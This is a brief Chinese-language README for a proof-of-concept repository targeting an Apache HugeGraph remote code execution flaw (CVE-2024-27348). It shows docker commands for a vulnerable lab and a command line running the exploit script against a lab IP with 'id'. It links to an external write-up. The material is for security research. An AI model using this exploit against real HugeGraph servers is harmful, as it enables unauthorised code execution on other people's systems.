这是 Apache HugeGraph 远程代码执行漏洞(CVE-2024-27348)的存储库。
docker pull hugegraph/hugegraph:1.0.0
docker run -it --name hgserver -p 8081:8080 hugegraph/hugegraph:1.0.0
services:
web:
image: vulhub/hugegraph:1.2.0
ports:
- "8080:8080"
- "5005:5005"
### docker compose up -d
### visit:http://your_ip:8080
python .\CVE-2024-27348.py -t http://192.168.41.163:8080 -c "id"

你可以在此查看全部内容:
https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-apache-hugegraph-server-cve-2024-27348